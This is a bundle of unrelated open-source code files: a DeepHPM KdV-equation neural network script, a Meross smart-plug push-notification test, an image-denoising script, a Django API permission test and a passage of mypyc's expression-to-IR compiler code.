elapsed = time.time() - start_time
loss_value = self.sess.run(self.idn_f_loss, tf_dict)
print('It: %d, Loss: %.3e, Time: %.2f' %
(it, loss_value, elapsed))
start_time = time.time()
self.idn_f_optimizer.minimize(self.sess,
feed_dict = tf_dict,
fetches = [self.idn_f_loss],
loss_callback = self.callback)
def idn_predict(self, t_star, x_star):
tf_dict = {self.t_tf: t_star, self.x_tf: x_star}
u_star = self.sess.run(self.idn_u_pred, tf_dict)
f_star = self.sess.run(self.idn_f_pred, tf_dict)
return u_star, f_star
def predict_pde(self, terms_star):
tf_dict = {self.terms_tf: terms_star}
pde_star = self.sess.run(self.pde_pred, tf_dict)
return pde_star
###########################################################################
############################### Solver ####################################
###########################################################################
def sol_init(self, x0, u0, tb, X_f, layers):
# Training Data for Solution
X0 = np.concatenate((0*x0, x0), 1) # (0, x0)
X_lb = np.concatenate((tb, 0*tb + self.lb_sol[1]), 1) # (tb, lb[1])
X_ub = np.concatenate((tb, 0*tb + self.ub_sol[1]), 1) # (tb, ub[1])
self.X_f = X_f # Collocation Points
self.t0 = X0[:,0:1] # Initial Data (time)
self.x0 = X0[:,1:2] # Initial Data (space)
self.t_lb = X_lb[:,0:1] # Boundary Data (time) -- lower boundary
self.x_lb = X_lb[:,1:2] # Boundary Data (space) -- lower boundary
self.t_ub = X_ub[:,0:1] # Boundary Data (time) -- upper boundary
self.x_ub = X_ub[:,1:2] # Boundary Data (space) -- upper boundary
self.t_f = X_f[:,0:1] # Collocation Points (time)
self.x_f = X_f[:,1:2] # Collocation Points (space)
self.u0 = u0 # Boundary Data
# Layers for Solution
self.layers = layers
# Initialize NNs for Solution
self.weights, self.biases = initialize_NN(layers)
# tf placeholders for Solution
self.t0_tf = tf.placeholder(tf.float32, shape=[None, 1])
self.x0_tf = tf.placeholder(tf.float32, shape=[None, 1])
self.u0_tf = tf.placeholder(tf.float32, shape=[None, 1])
self.t_lb_tf = tf.placeholder(tf.float32, shape=[None, 1])
self.x_lb_tf = tf.placeholder(tf.float32, shape=[None, 1])
self.t_ub_tf = tf.placeholder(tf.float32, shape=[None, 1])
self.x_ub_tf = tf.placeholder(tf.float32, shape=[None, 1])
self.t_f_tf = tf.placeholder(tf.float32, shape=[None, 1])
self.x_f_tf = tf.placeholder(tf.float32, shape=[None, 1])
# tf graphs for Solution
self.u0_pred, _, _ = self.sol_net_u(self.t0_tf, self.x0_tf)
self.u_lb_pred, self.u_x_lb_pred, self.u_xx_lb_pred = self.sol_net_u(self.t_lb_tf, self.x_lb_tf)
self.u_ub_pred, self.u_x_ub_pred, self.u_xx_ub_pred = self.sol_net_u(self.t_ub_tf, self.x_ub_tf)
self.sol_f_pred = self.sol_net_f(self.t_f_tf, self.x_f_tf)
# loss for Solution
self.sol_loss = tf.reduce_sum(tf.square(self.u0_tf - self.u0_pred)) + \
tf.reduce_sum(tf.square(self.u_lb_pred - self.u_ub_pred)) + \
tf.reduce_sum(tf.square(self.u_x_lb_pred - self.u_x_ub_pred)) + \
tf.reduce_sum(tf.square(self.u_xx_lb_pred - self.u_xx_ub_pred)) + \
tf.reduce_sum(tf.square(self.sol_f_pred))
# Optimizer for Solution
self.sol_optimizer = tf.contrib.opt.ScipyOptimizerInterface(self.sol_loss,
var_list = self.weights + self.biases,
method = 'L-BFGS-B',
options = {'maxiter': 50000,
'maxfun': 50000,
'maxcor': 50,
'maxls': 50,
'ftol': 1.0*np.finfo(float).eps})
self.sol_optimizer_Adam = tf.train.AdamOptimizer()
self.sol_train_op_Adam = self.sol_optimizer_Adam.minimize(self.sol_loss,
var_list = self.weights + self.biases)
def sol_net_u(self, t, x):
X = tf.concat([t,x],1)
H = 2*(X - self.lb_sol)/(self.ub_sol - self.lb_sol) - 1
u = neural_net(H, self.weights, self.biases)
u_x = tf.gradients(u, x)[0]
u_xx = tf.gradients(u_x, x)[0]
return u, u_x, u_xx
def sol_net_f(self, t, x):
u, u_x, u_xx = self.sol_net_u(t,x)
u_t = tf.gradients(u, t)[0]
u_xxx = tf.gradients(u_xx, x)[0]
terms = tf.concat([u,u_x,u_xx,u_xxx],1)
f = u_t - self.net_pde(terms)
return f
def callback(self, loss):
print('Loss: %e' % (loss))
def sol_train(self, N_iter):
tf_dict = {self.t0_tf: self.t0, self.x0_tf: self.x0,
self.u0_tf: self.u0,
self.t_lb_tf: self.t_lb, self.x_lb_tf: self.x_lb,
self.t_ub_tf: self.t_ub, self.x_ub_tf: self.x_ub,
self.t_f_tf: self.t_f, self.x_f_tf: self.x_f}
start_time = time.time()
for it in range(N_iter):
self.sess.run(self.sol_train_op_Adam, tf_dict)
# Print
if it % 10 == 0:
elapsed = time.time() - start_time
loss_value = self.sess.run(self.sol_loss, tf_dict)
print('It: %d, Loss: %.3e, Time: %.2f' %
(it, loss_value, elapsed))
start_time = time.time()
self.sol_optimizer.minimize(self.sess,
feed_dict = tf_dict,
fetches = [self.sol_loss],
loss_callback = self.callback)
def sol_predict(self, t_star, x_star):
u_star = self.sess.run(self.u0_pred, {self.t0_tf: t_star, self.x0_tf: x_star})
f_star = self.sess.run(self.sol_f_pred, {self.t_f_tf: t_star, self.x_f_tf: x_star})
return u_star, f_star
###############################################################################
################################ Main Function ################################
###############################################################################
if __name__ == "__main__":
# Doman bounds
lb_idn = np.array([0.0, -20.0])
ub_idn = np.array([40.0, 20.0])
lb_sol = np.array([0.0, -20.0])
ub_sol = np.array([40.0, 20.0])
### Load Data ###
data_idn = scipy.io.loadmat('../Data/KdV_sine.mat')
t_idn = data_idn['t'].flatten()[:,None]
x_idn = data_idn['x'].flatten()[:,None]
Exact_idn = np.real(data_idn['usol'])
T_idn, X_idn = np.meshgrid(t_idn,x_idn)
keep = 2/3
index = int(keep*t_idn.shape[0])
T_idn = T_idn[:,0:index]
X_idn = X_idn[:,0:index]
Exact_idn = Exact_idn[:,0:index]
t_idn_star = T_idn.flatten()[:,None]
x_idn_star = X_idn.flatten()[:,None]
X_idn_star = np.hstack((t_idn_star, x_idn_star))
u_idn_star = Exact_idn.flatten()[:,None]
#
data_sol = scipy.io.loadmat('../Data/KdV_sine.mat')
t_sol = data_sol['t'].flatten()[:,None]
x_sol = data_sol['x'].flatten()[:,None]
Exact_sol = np.real(data_sol['usol'])
T_sol, X_sol = np.meshgrid(t_sol,x_sol)
t_sol_star = T_sol.flatten()[:,None]
x_sol_star = X_sol.flatten()[:,None]
X_sol_star = np.hstack((t_sol_star, x_sol_star))
u_sol_star = Exact_sol.flatten()[:,None]
### Training Data ###
# For identification
N_train = 10000
idx = np.random.choice(t_idn_star.shape[0], N_train, replace=False)
t_train = t_idn_star[idx,:]
x_train = x_idn_star[idx,:]
u_train = u_idn_star[idx,:]
noise = 0.00
u_train = u_train + noise*np.std(u_train)*np.random.randn(u_train.shape[0], u_train.shape[1])
# For solution
N0 = Exact_sol.shape[0]
N_b = Exact_sol.shape[1]
N_f = 20000
idx_x = np.random.choice(x_sol.shape[0], N0, replace=False)
x0_train = x_sol[idx_x,:]
u0_train = Exact_sol[idx_x,0:1]
idx_t = np.random.choice(t_sol.shape[0], N_b, replace=False)
tb_train = t_sol[idx_t,:]
X_f_train = lb_sol + (ub_sol-lb_sol)*lhs(2, N_f)
# Layers
u_layers = [2, 50, 50, 50, 50, 1]
pde_layers = [4, 100, 100, 1]
layers = [2, 50, 50, 50, 50, 1]
# Model
model = DeepHPM(t_train, x_train, u_train,
x0_train, u0_train, tb_train, X_f_train,
u_layers, pde_layers,
layers,
lb_idn, ub_idn,
lb_sol, ub_sol)
# Train the identifier
model.idn_u_train(N_iter=0)
model.idn_f_train(N_iter=0)
u_pred_identifier, f_pred_identifier = model.idn_predict(t_idn_star, x_idn_star)
error_u_identifier = np.linalg.norm(u_idn_star-u_pred_identifier,2)/np.linalg.norm(u_idn_star,2)
print('Error u: %e' % (error_u_identifier))
### Solution ###
# Train the solver
model.sol_train(N_iter=0)
u_pred, f_pred = model.sol_predict(t_sol_star, x_sol_star)
u_pred_idn, f_pred_idn = model.sol_predict(t_idn_star, x_idn_star)
error_u = np.linalg.norm(u_sol_star-u_pred,2)/np.linalg.norm(u_sol_star,2)
error_u_idn = np.linalg.norm(u_idn_star-u_pred_idn,2)/np.linalg.norm(u_idn_star,2)
print('Error u: %e' % (error_u))
print('Error u (idn): %e' % (error_u_idn))
U_pred = griddata(X_sol_star, u_pred.flatten(), (T_sol, X_sol), method='cubic')
######################################################################
############################# Plotting ###############################
######################################################################
fig, ax = newfig(1.0, 0.6)
ax.axis('off')
######## Row 2: Pressure #######################
######## Predicted p(t,x,y) ###########
gs = gridspec.GridSpec(1, 2)
gs.update(top=0.8, bottom=0.2, left=0.1, right=0.9, wspace=0.5)
ax = plt.subplot(gs[:, 0])
h = ax.imshow(Exact_sol, interpolation='nearest', cmap='jet',
extent=[lb_sol[0], ub_sol[0], lb_sol[1], ub_sol[1]],
origin='lower', aspect='auto')
divider = make_axes_locatable(ax)
cax = divider.append_axes("right", size="5%", pad=0.05)
fig.colorbar(h, cax=cax)
ax.set_xlabel('$t$')
ax.set_ylabel('$x$')
#ax.set_aspect('equal', 'box')
ax.set_title('Exact Dynamics', fontsize = 10)
line = np.linspace(lb_sol[1], ub_sol[1], 2)[:,None]
ax.plot(t_idn[index]*np.ones((2,1)), line, 'w-', linewidth = 1)
######## Exact p(t,x,y) ###########
ax = plt.subplot(gs[:, 1])
h = ax.imshow(U_pred, interpolation='nearest', cmap='jet',
extent=[lb_sol[0], ub_sol[0], lb_sol[1], ub_sol[1]],
origin='lower', aspect='auto')
divider = make_axes_locatable(ax)
cax = divider.append_axes("right", size="5%", pad=0.05)
fig.colorbar(h, cax=cax)
ax.set_xlabel('$t$')
ax.set_ylabel('$x$')
#ax.set_aspect('equal', 'box')
ax.set_title('Learned Dynamics', fontsize = 10)
line = np.linspace(lb_sol[1], ub_sol[1], 2)[:,None]
ax.plot(t_idn[index]*np.ones((2,1)), line, 'w-', linewidth = 1)
# savefig('./figures/KdV_Extrapolate')
|
the-stack_0_25917
|
import os
from aiohttp import web
from aiohttp.test_utils import AioHTTPTestCase, unittest_run_loop
from meross_iot.controller.mixins.toggle import ToggleXMixin
from meross_iot.manager import MerossManager
from meross_iot.model.enums import OnlineStatus
from tests import async_get_client
if os.name == 'nt':
import asyncio
asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
else:
import asyncio
class TestPushNotificationHandler(AioHTTPTestCase):
async def get_application(self):
return web.Application()
async def setUpAsync(self):
# Wait some time before next test-burst
await asyncio.sleep(10)
self.meross_client, self.requires_logout = await async_get_client()
# Look for a device to be used for this test
self.meross_manager = MerossManager(http_client=self.meross_client)
await self.meross_manager.async_init()
devices = await self.meross_manager.async_device_discovery()
toggle_devices = self.meross_manager.find_devices(device_class=ToggleXMixin, online_status=OnlineStatus.ONLINE)
if len(toggle_devices) < 1:
self.test_device = None
else:
self.test_device = toggle_devices[0]
@unittest_run_loop
async def test_dev_push_notification(self):
if self.test_device is None:
self.skipTest("No ToggleX device has been found to run this test on.")
return
# Set the toggle device to ON state
await self.test_device.async_turn_on()
# Create a new manager
new_meross_client, requires_logout = await async_get_client()
m = None
try:
# Retrieve the same device with another manager
m = MerossManager(http_client=new_meross_client)
await m.async_init()
await m.async_device_discovery()
devs = m.find_devices(device_uuids=(self.test_device.uuid,))
dev = devs[0]
e = asyncio.Event()
# Define the coroutine for handling push notification
async def my_coro(namespace, data, device_internal_id):
e.set()
dev.register_push_notification_handler_coroutine(my_coro)
await self.test_device.async_turn_off()
await asyncio.wait_for(e.wait(), 5.0)
finally:
if m is not None:
m.close()
if requires_logout:
await new_meross_client.async_logout()
async def tearDownAsync(self):
if self.requires_logout:
await self.meross_client.async_logout()
|
the-stack_0_25918
|
# from denoise_image.config import *
from denoise_image.config import denoise_image_config as config
from denoise_image.pyimagesearch.denoising.helper import blur_and_threshold
from imutils import paths
import pickle
import cv2
# load the model
model = pickle.loads(open(config.MODEL_PATH, "rb").read())
img_path = 'denoise_image/dirty-documents/test/61.png'
def denoise(img_path):
img = cv2.imread(img_path)
img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
copy = img.copy()
# add padding
img = cv2.copyMakeBorder(img, 2, 2, 2, 2, cv2.BORDER_REPLICATE)
img = blur_and_threshold(img)
region_features = []
for y in range(0, img.shape[0]):
for x in range(0, img.shape[1]):
# extract the region
region = img[y:y+5, x:x+5]
(rH, rW) = region.shape[:2]
# continue if region is not 5x5
if rW != 5 or rH != 5:
continue
# flatten the region values
features = region.flatten()
region_features.append(features)
# predict the image
pixels = model.predict(region_features)
# reshape the image as per original image size
pixels = pixels.reshape(copy.shape)
# change values between 0 and 255
output = (pixels * 255).astype("uint8")
return output
# cv2.imshow('original', copy)
# cv2.waitKey(0)
# cv2.imshow('clean', output)
# cv2.waitKey(0)
# cv2.destroyAllWindows()
# cv2.imwrite('61.png', output)
|
the-stack_0_25920
|
# -*- coding: utf-8 -*-
"""
Tests for the CAG API ViewSets.
"""
import pytest
from course_access_groups.permissions import CommonAuthMixin
from course_access_groups.views import CourseAccessGroupViewSet
from test_utils import get_api_view_classes
class TestCommonAuthMixinUsage:
"""
Ensure the CommonAuthMixin is used by APIs.
"""
def test_sanity_check(self):
"""
Ensure that `api_view_classes` contains the correct classes.
A sanity check just in case the `get_api_view_classes` helper is incorrect.
"""
api_view_classes = get_api_view_classes()
assert api_view_classes, 'View classes are being found correctly.'
assert CourseAccessGroupViewSet in api_view_classes
@pytest.mark.parametrize('api_view_class', get_api_view_classes())
def test_common_auth_mixin_used(self, api_view_class):
"""
Ensure CommonAuthMixin is used on all API ViewSets.
:param api_view_class: An API view class e.g. MembershipRuleViewSet
`get_api_view_classes()` auto discovers the following views:
- CourseAccessGroupViewSet
- MemberViewSet
- MembershipRuleViewSet
- GroupCourseViewSet
- in addition to any other future class
"""
assert issubclass(api_view_class, CommonAuthMixin), 'Permissions: {cls} should inherit from {parent}'.format(
cls=api_view_class.__name__,
parent=CommonAuthMixin.__name__,
)
|
the-stack_0_25925
|
"""Transform mypy expression ASTs to mypyc IR (Intermediate Representation).
The top-level AST transformation logic is implemented in mypyc.irbuild.visitor
and mypyc.irbuild.builder.
"""
from typing import List, Optional, Union, Callable, cast
from mypy.nodes import (
Expression, NameExpr, MemberExpr, SuperExpr, CallExpr, UnaryExpr, OpExpr, IndexExpr,
ConditionalExpr, ComparisonExpr, IntExpr, FloatExpr, ComplexExpr, StrExpr,
BytesExpr, EllipsisExpr, ListExpr, TupleExpr, DictExpr, SetExpr, ListComprehension,
SetComprehension, DictionaryComprehension, SliceExpr, GeneratorExpr, CastExpr, StarExpr,
AssignmentExpr, AssertTypeExpr,
Var, RefExpr, MypyFile, TypeInfo, TypeApplication, LDEF, ARG_POS
)
from mypy.types import TupleType, Instance, TypeType, ProperType, get_proper_type
from mypyc.common import MAX_SHORT_INT
from mypyc.ir.ops import (
Value, Register, TupleGet, TupleSet, BasicBlock, Assign, LoadAddress, RaiseStandardError
)
from mypyc.ir.rtypes import (
RTuple, object_rprimitive, is_none_rprimitive, int_rprimitive, is_int_rprimitive
)
from mypyc.ir.func_ir import FUNC_CLASSMETHOD, FUNC_STATICMETHOD
from mypyc.irbuild.format_str_tokenizer import (
tokenizer_printf_style, join_formatted_strings, convert_format_expr_to_str,
convert_format_expr_to_bytes, join_formatted_bytes
)
from mypyc.primitives.bytes_ops import bytes_slice_op
from mypyc.primitives.registry import CFunctionDescription, builtin_names
from mypyc.primitives.generic_ops import iter_op
from mypyc.primitives.misc_ops import new_slice_op, ellipsis_op, type_op, get_module_dict_op
from mypyc.primitives.list_ops import list_append_op, list_extend_op, list_slice_op
from mypyc.primitives.tuple_ops import list_tuple_op, tuple_slice_op
from mypyc.primitives.dict_ops import dict_new_op, dict_set_item_op, dict_get_item_op
from mypyc.primitives.set_ops import set_add_op, set_update_op
from mypyc.primitives.str_ops import str_slice_op
from mypyc.primitives.int_ops import int_comparison_op_mapping
from mypyc.irbuild.specialize import apply_function_specialization, apply_method_specialization
from mypyc.irbuild.builder import IRBuilder
from mypyc.irbuild.for_helpers import (
translate_list_comprehension, translate_set_comprehension,
comprehension_helper
)
from mypyc.irbuild.constant_fold import constant_fold_expr
# Name and attribute references
def transform_name_expr(builder: IRBuilder, expr: NameExpr) -> Value:
if expr.node is None:
builder.add(RaiseStandardError(RaiseStandardError.RUNTIME_ERROR,
"mypyc internal error: should be unreachable",
expr.line))
return builder.none()
fullname = expr.node.fullname
if fullname in builtin_names:
typ, src = builtin_names[fullname]
return builder.add(LoadAddress(typ, src, expr.line))
# special cases
if fullname == 'builtins.None':
return builder.none()
if fullname == 'builtins.True':
return builder.true()
if fullname == 'builtins.False':
return builder.false()
if isinstance(expr.node, Var) and expr.node.is_final:
value = builder.emit_load_final(
expr.node,
fullname,
expr.name,
builder.is_native_ref_expr(expr),
builder.types[expr],
expr.line,
)
if value is not None:
return value
if isinstance(expr.node, MypyFile) and expr.node.fullname in builder.imports:
return builder.load_module(expr.node.fullname)
# If the expression is locally defined, then read the result from the corresponding
# assignment target and return it. Otherwise if the expression is a global, load it from
# the globals dictionary.
# Except for imports, that currently always happens in the global namespace.
if expr.kind == LDEF and not (isinstance(expr.node, Var)
and expr.node.is_suppressed_import):
# Try to detect and error when we hit the irritating mypy bug
# where a local variable is cast to None. (#5423)
if (isinstance(expr.node, Var) and is_none_rprimitive(builder.node_type(expr))
and expr.node.is_inferred):
builder.error(
'Local variable "{}" has inferred type None; add an annotation'.format(
expr.node.name),
expr.node.line)
# TODO: Behavior currently only defined for Var, FuncDef and MypyFile node types.
if isinstance(expr.node, MypyFile):
# Load reference to a module imported inside function from
# the modules dictionary. It would be closer to Python
# semantics to access modules imported inside functions
# via local variables, but this is tricky since the mypy
# AST doesn't include a Var node for the module. We
# instead load the module separately on each access.
mod_dict = builder.call_c(get_module_dict_op, [], expr.line)
obj = builder.call_c(dict_get_item_op,
[mod_dict, builder.load_str(expr.node.fullname)],
expr.line)
return obj
else:
return builder.read(builder.get_assignment_target(expr), expr.line)
return builder.load_global(expr)
def transform_member_expr(builder: IRBuilder, expr: MemberExpr) -> Value:
# First check if this is maybe a final attribute.
final = builder.get_final_ref(expr)
if final is not None:
fullname, final_var, native = final
value = builder.emit_load_final(final_var, fullname, final_var.name, native,
builder.types[expr], expr.line)
if value is not None:
return value
if isinstance(expr.node, MypyFile) and expr.node.fullname in builder.imports:
return builder.load_module(expr.node.fullname)
obj = builder.accept(expr.expr)
rtype = builder.node_type(expr)
# Special case: for named tuples transform attribute access to faster index access.
typ = get_proper_type(builder.types.get(expr.expr))
if isinstance(typ, TupleType) and typ.partial_fallback.type.is_named_tuple:
fields = typ.partial_fallback.type.metadata['namedtuple']['fields']
if expr.name in fields:
index = builder.builder.load_int(fields.index(expr.name))
return builder.gen_method_call(obj, '__getitem__', [index], rtype, expr.line)
check_instance_attribute_access_through_class(builder, expr, typ)
return builder.builder.get_attr(obj, expr.name, rtype, expr.line)
def check_instance_attribute_access_through_class(builder: IRBuilder,
expr: MemberExpr,
typ: Optional[ProperType]) -> None:
"""Report error if accessing an instance attribute through class object."""
if isinstance(expr.expr, RefExpr):
node = expr.expr.node
if isinstance(typ, TypeType) and isinstance(typ.item, Instance):
# TODO: Handle other item types
node = typ.item.type
if isinstance(node, TypeInfo):
class_ir = builder.mapper.type_to_ir.get(node)
if class_ir is not None and class_ir.is_ext_class:
sym = node.get(expr.name)
if (sym is not None
and isinstance(sym.node, Var)
and not sym.node.is_classvar
and not sym.node.is_final):
builder.error(
'Cannot access instance attribute "{}" through class object'.format(
expr.name),
expr.line
)
builder.note(
'(Hint: Use "x: Final = ..." or "x: ClassVar = ..." to define '
'a class attribute)',
expr.line
)
def transform_super_expr(builder: IRBuilder, o: SuperExpr) -> Value:
# warning(builder, 'can not optimize super() expression', o.line)
sup_val = builder.load_module_attr_by_fullname('builtins.super', o.line)
if o.call.args:
args = [builder.accept(arg) for arg in o.call.args]
else:
assert o.info is not None
typ = builder.load_native_type_object(o.info.fullname)
ir = builder.mapper.type_to_ir[o.info]
iter_env = iter(builder.builder.args)
# Grab first argument
vself: Value = next(iter_env)
if builder.fn_info.is_generator:
# grab sixth argument (see comment in translate_super_method_call)
self_targ = list(builder.symtables[-1].values())[6]
vself = builder.read(self_targ, builder.fn_info.fitem.line)
elif not ir.is_ext_class:
vself = next(iter_env) # second argument is self if non_extension class
args = [typ, vself]
res = builder.py_call(sup_val, args, o.line)
return builder.py_get_attr(res, o.name, o.line)
# Calls
def transform_call_expr(builder: IRBuilder, expr: CallExpr) -> Value:
if isinstance(expr.analyzed, CastExpr):
return translate_cast_expr(builder, expr.analyzed)
elif isinstance(expr.analyzed, AssertTypeExpr):
# Compile to a no-op.
return builder.accept(expr.analyzed.expr)
callee = expr.callee
if isinstance(callee, IndexExpr) and isinstance(callee.analyzed, TypeApplication):
callee = callee.analyzed.expr # Unwrap type application
if isinstance(callee, MemberExpr):
return apply_method_specialization(builder, expr, callee) or \
translate_method_call(builder, expr, callee)
elif isinstance(callee, SuperExpr):
return translate_super_method_call(builder, expr, callee)
else:
return translate_call(builder, expr, callee)
def translate_call(builder: IRBuilder, expr: CallExpr, callee: Expression) -> Value:
# The common case of calls is refexprs
if isinstance(callee, RefExpr):
return apply_function_specialization(builder, expr, callee) or \
translate_refexpr_call(builder, expr, callee)
function = builder.accept(callee)
args = [builder.accept(arg) for arg in expr.args]
return builder.py_call(function, args, expr.line,
arg_kinds=expr.arg_kinds, arg_names=expr.arg_names)
def translate_refexpr_call(builder: IRBuilder, expr: CallExpr, callee: RefExpr) -> Value:
"""Translate a non-method call."""
# Gen the argument values
arg_values = [builder.accept(arg) for arg in expr.args]
return builder.call_refexpr_with_args(expr, callee, arg_values)
def translate_method_call(builder: IRBuilder, expr: CallExpr, callee: MemberExpr) -> Value:
"""Generate IR for an arbitrary call of form e.m(...).
This can also deal with calls to module-level functions.
"""
if builder.is_native_ref_expr(callee):
# Call to module-level native function or such
return translate_call(builder, expr, callee)
elif (
isinstance(callee.expr, RefExpr)
and isinstance(callee.expr.node, TypeInfo)
and callee.expr.node in builder.mapper.type_to_ir
and builder.mapper.type_to_ir[callee.expr.node].has_method(callee.name)
):
# Call a method via the *class*
assert isinstance(callee.expr.node, TypeInfo)
ir = builder.mapper.type_to_ir[callee.expr.node]
decl = ir.method_decl(callee.name)
args = []
arg_kinds, arg_names = expr.arg_kinds[:], expr.arg_names[:]
# Add the class argument for class methods in extension classes
if decl.kind == FUNC_CLASSMETHOD and ir.is_ext_class:
args.append(builder.load_native_type_object(callee.expr.node.fullname))
arg_kinds.insert(0, ARG_POS)
arg_names.insert(0, None)
args += [builder.accept(arg) for arg in expr.args]
if ir.is_ext_class:
return builder.builder.call(decl, args, arg_kinds, arg_names, expr.line)
else:
obj = builder.accept(callee.expr)
return builder.gen_method_call(obj,
callee.name,
args,
builder.node_type(expr),
expr.line,
expr.arg_kinds,
expr.arg_names)
elif builder.is_module_member_expr(callee):
# Fall back to a PyCall for non-native module calls
function = builder.accept(callee)
args = [builder.accept(arg) for arg in expr.args]
return builder.py_call(function, args, expr.line,
arg_kinds=expr.arg_kinds, arg_names=expr.arg_names)
else:
receiver_typ = builder.node_type(callee.expr)
# If there is a specializer for this method name/type, try calling it.
# We would return the first successful one.
val = apply_method_specialization(builder, expr, callee, receiver_typ)
if val is not None:
return val
obj = builder.accept(callee.expr)
args = [builder.accept(arg) for arg in expr.args]
return builder.gen_method_call(obj,
callee.name,
args,
builder.node_type(expr),
expr.line,
expr.arg_kinds,
expr.arg_names)
def translate_super_method_call(builder: IRBuilder, expr: CallExpr, callee: SuperExpr) -> Value:
if callee.info is None or (len(callee.call.args) != 0 and len(callee.call.args) != 2):
return translate_call(builder, expr, callee)
# We support two-argument super but only when it is super(CurrentClass, self)
# TODO: We could support it when it is a parent class in many cases?
if len(callee.call.args) == 2:
self_arg = callee.call.args[1]
if (
not isinstance(self_arg, NameExpr)
or not isinstance(self_arg.node, Var)
or not self_arg.node.is_self
):
return translate_call(builder, expr, callee)
typ_arg = callee.call.args[0]
if (
not isinstance(typ_arg, NameExpr)
or not isinstance(typ_arg.node, TypeInfo)
or callee.info is not typ_arg.node
):
return translate_call(builder, expr, callee)
ir = builder.mapper.type_to_ir[callee.info]
# Search for the method in the mro, skipping ourselves. We
# determine targets of super calls to native methods statically.
for base in ir.mro[1:]:
if callee.name in base.method_decls:
break
else:
if (ir.is_ext_class
and ir.builtin_base is None
and not ir.inherits_python
and callee.name == '__init__'
and len(expr.args) == 0):
# Call translates to object.__init__(self), which is a
# no-op, so omit the call.
return builder.none()
return translate_call(builder, expr, callee)
decl = base.method_decl(callee.name)
arg_values = [builder.accept(arg) for arg in expr.args]
arg_kinds, arg_names = expr.arg_kinds[:], expr.arg_names[:]
if decl.kind != FUNC_STATICMETHOD:
# Grab first argument
vself: Value = builder.self()
if decl.kind == FUNC_CLASSMETHOD:
vself = builder.call_c(type_op, [vself], expr.line)
elif builder.fn_info.is_generator:
# For generator classes, the self target is the 6th value
# in the symbol table (which is an ordered dict). This is sort
# of ugly, but we can't search by name since the 'self' parameter
# could be named anything, and it doesn't get added to the
# environment indexes.
self_targ = list(builder.symtables[-1].values())[6]
vself = builder.read(self_targ, builder.fn_info.fitem.line)
arg_values.insert(0, vself)
arg_kinds.insert(0, ARG_POS)
arg_names.insert(0, None)
return builder.builder.call(decl, arg_values, arg_kinds, arg_names, expr.line)
def translate_cast_expr(builder: IRBuilder, expr: CastExpr) -> Value:
src = builder.accept(expr.expr)
target_type = builder.type_to_rtype(expr.type)
return builder.coerce(src, target_type, expr.line)
# Operators
def transform_unary_expr(builder: IRBuilder, expr: UnaryExpr) -> Value:
folded = try_constant_fold(builder, expr)
if folded:
return folded
return builder.unary_op(builder.accept(expr.expr), expr.op, expr.line)
def transform_op_expr(builder: IRBuilder, expr: OpExpr) -> Value:
if expr.op in ('and', 'or'):
return builder.shortcircuit_expr(expr)
# Special case for string formatting
if expr.op == '%' and (isinstance(expr.left, StrExpr) or isinstance(expr.left, BytesExpr)):
ret = translate_printf_style_formatting(builder, expr.left, expr.right)
if ret is not None:
return ret
folded = try_constant_fold(builder, expr)
if folded:
return folded
return builder.binary_op(
builder.accept(expr.left), builder.accept(expr.right), expr.op, expr.line
)
def transform_index_expr(builder: IRBuilder, expr: IndexExpr) -> Value:
base = builder.accept(expr.base)
index = expr.index
if isinstance(base.type, RTuple) and isinstance(index, IntExpr):
return builder.add(TupleGet(base, index.value, expr.line))
if isinstance(index, SliceExpr):
value = try_gen_slice_op(builder, base, index)
if value:
return value
index_reg = builder.accept(expr.index)
return builder.gen_method_call(
base, '__getitem__', [index_reg], builder.node_type(expr), expr.line)
def try_constant_fold(builder: IRBuilder, expr: Expression) -> Optional[Value]:
"""Return the constant value of an expression if possible.
Return None otherwise.
"""
value = constant_fold_expr(builder, expr)
if isinstance(value, int):
return builder.load_int(value)
elif isinstance(value, str):
return builder.load_str(value)
return None
def try_gen_slice_op(builder: IRBuilder, base: Value, index: SliceExpr) -> Optional[Value]:
"""Generate specialized slice op for some index expressions.
Return None if a specialized op isn't available.
This supports obj[x:y], obj[:x], and obj[x:] for a few types.
"""
if index.stride:
# We can only handle the default stride of 1.
return None
if index.begin_index:
begin_type = builder.node_type(index.begin_index)
else:
begin_type = int_rprimitive
if index.end_index:
end_type = builder.node_type(index.end_index)
else:
end_type = int_rprimitive
# Both begin and end index must be int (or missing).
if is_int_rprimitive(begin_type) and is_int_rprimitive(end_type):
if index.begin_index:
begin = builder.accept(index.begin_index)
else:
begin = builder.load_int(0)
if index.end_index:
end = builder.accept(index.end_index)
else:
# Replace missing end index with the largest short integer
# (a sequence can't be longer).
end = builder.load_int(MAX_SHORT_INT)
candidates = [list_slice_op, tuple_slice_op, str_slice_op, bytes_slice_op]
return builder.builder.matching_call_c(candidates, [base, begin, end], index.line)
return None
def transform_conditional_expr(builder: IRBuilder, expr: ConditionalExpr) -> Value:
if_body, else_body, next_block = BasicBlock(), BasicBlock(), BasicBlock()
builder.process_conditional(expr.cond, if_body, else_body)
expr_type = builder.node_type(expr)
# Having actual Phi nodes would be really nice here!
target = Register(expr_type)
builder.activate_block(if_body)
true_value = builder.accept(expr.if_expr)
true_value = builder.coerce(true_value, expr_type, expr.line)
builder.add(Assign(target, true_value))
builder.goto(next_block)
builder.activate_block(else_body)
false_value = builder.accept(expr.else_expr)
false_value = builder.coerce(false_value, expr_type, expr.line)
builder.add(Assign(target, false_value))
builder.goto(next_block)
builder.activate_block(next_block)
return target
def transform_comparison_expr(builder: IRBuilder, e: ComparisonExpr) -> Value:
# x in (...)/[...]
# x not in (...)/[...]
if (e.operators[0] in ['in', 'not in']
and len(e.operators) == 1
and isinstance(e.operands[1], (TupleExpr, ListExpr))):
items = e.operands[1].items
n_items = len(items)
# x in y -> x == y[0] or ... or x == y[n]
# x not in y -> x != y[0] and ... and x != y[n]
# 16 is arbitrarily chosen to limit code size
if 1 < n_items < 16:
if e.operators[0] == 'in':
bin_op = 'or'
cmp_op = '=='
else:
bin_op = 'and'
cmp_op = '!='
lhs = e.operands[0]
mypy_file = builder.graph['builtins'].tree
assert mypy_file is not None
bool_type = Instance(cast(TypeInfo, mypy_file.names['bool'].node), [])
exprs = []
for item in items:
expr = ComparisonExpr([cmp_op], [lhs, item])
builder.types[expr] = bool_type
exprs.append(expr)
or_expr: Expression = exprs.pop(0)
for expr in exprs:
or_expr = OpExpr(bin_op, or_expr, expr)
builder.types[or_expr] = bool_type
return builder.accept(or_expr)
# x in [y]/(y) -> x == y
# x not in [y]/(y) -> x != y
elif n_items == 1:
if e.operators[0] == 'in':
cmp_op = '=='
else:
cmp_op = '!='
